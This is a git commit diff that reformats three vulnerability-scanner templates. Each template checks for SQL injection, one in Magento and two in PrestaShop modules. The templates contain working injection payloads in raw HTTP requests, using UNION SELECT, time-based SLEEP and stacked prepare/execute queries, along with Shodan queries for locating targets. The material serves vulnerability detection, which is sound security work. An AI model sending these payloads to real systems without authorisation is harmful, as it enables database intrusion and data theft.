minor format changes

patch-1
Dhiyaneshwaran 2024-04-15 18:04:11 +05:30
parent 8413c702c5
commit ffaea01532
3 changed files with 95 additions and 42 deletions

View File

@ -1,53 +1,69 @@
id: CVE-2019-7139
info:
name: CVE-2019-7139
name: Magento - SQL Injection
author: MaStErChO
severity: high
severity: critical
description: |
The Magento application running on the remote web server is affected by a SQL injection vulnerability due to failing to properly sanitize the user-supplied from and to inputs to the prepareSqlCondition function of the Magento\Framework\DB\Adapter\Pdo\Mysql class. An unauthenticated, remote attacker can exploit this to execute arbitrary SQL statements against the back-end database, leading to the execution of arbitrary code, manipulation of data, or disclosure of sensitive information
An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
remediation: This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
reference:
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
- https://www.ambionics.io/blog/magento-sqli
- https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
- https://github.com/koutto/jok3r-pocs
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-7139
cwe-id: CWE-89
epss-score: 0.00582
epss-percentile: 0.778
cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
metadata:
verified: true
max-request: 4
vendor: magento
product: magento
framework: magento
tags: sqli,magento
shodan-query: http.component:"Magento"
tags: cve,cve2019,sqli,magento
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: dsl
name: Blind
name: time-based
dsl:
- 'duration_2>=6'
- 'status_code_1 == 200'
- 'contains(body_1, "text/x-magento-init")'
- 'status_code_2 == 200'
- 'status_code_3 == 400'
- 'contains(content_type_2, "application/json")'
- 'contains(content_type_3, "application/json")'
- 'len(body_2) == 2'
- 'len(body_3) == 2'
condition: and
- type: dsl
name: Time
name: blind-based
dsl:
- 'contains(body_1, "text/x-magento-init")'
- 'duration_4>=6'
- 'contains(content_type_4, "application/json")'
- 'len(body_4) == 2'
- 'contains(content_type_3, "application/json") && contains(content_type_4, "application/json")'
- 'status_code_3 == 200 && status_code_4 == 400'
- 'len(body_3) == 2 && len(body_4) == 2'
condition: and

View File

@ -1,36 +1,46 @@
id: CVE-2023-27032
info:
name: CVE-2023-27032
name: PrestaShop AdvancedPopupCreator - SQL Injection
author: MaStErChO
severity: critical
description: |
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
- https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27032
cwe-id: CWE-89
epss-score: 0.00106
epss-percentile: 0.42495
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
metadata:
max-request: 1
vendor: idnovate
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,advancedpopupcreator
verified: true
tags: cve,cve2023,sqli,prestashop,advancedpopupcreator
http:
- raw:
- |
@timeout 10s
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time=1709941392995&token=1946dc43bb8d7cb5fef89588e87479d8
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time=&token=
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 200
- type: word
part: body
words:
- "popups"
- duration>=6
- status_code == 200
- contains(content_type, "text/html")
- contains_all(body, 'popups','hasError')
condition: and

View File

@ -1,32 +1,59 @@
id: CVE-2023-45375
info:
name: CVE-2023-45375
name: PrestaShop PireosPay - SQL Injection
author: MaStErChO
severity: high
description: |
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-45375
cwe-id: CWE-89
epss-score: 0.0005
epss-percentile: 0.17639
cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
metadata:
max-request: 1
verified: true
vendor: 01generator
product: pireospay
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,pireospay
tags: cve,cve2023,sqli,prestashop,pireospay
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "/modules/pireospay/")
condition: and
internal: true
- raw:
- |
@timeout: 10
POST /module/pireospay/validation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 302
- duration>=6
- status_code == 302
- contains(content_type, "text/html")
condition: and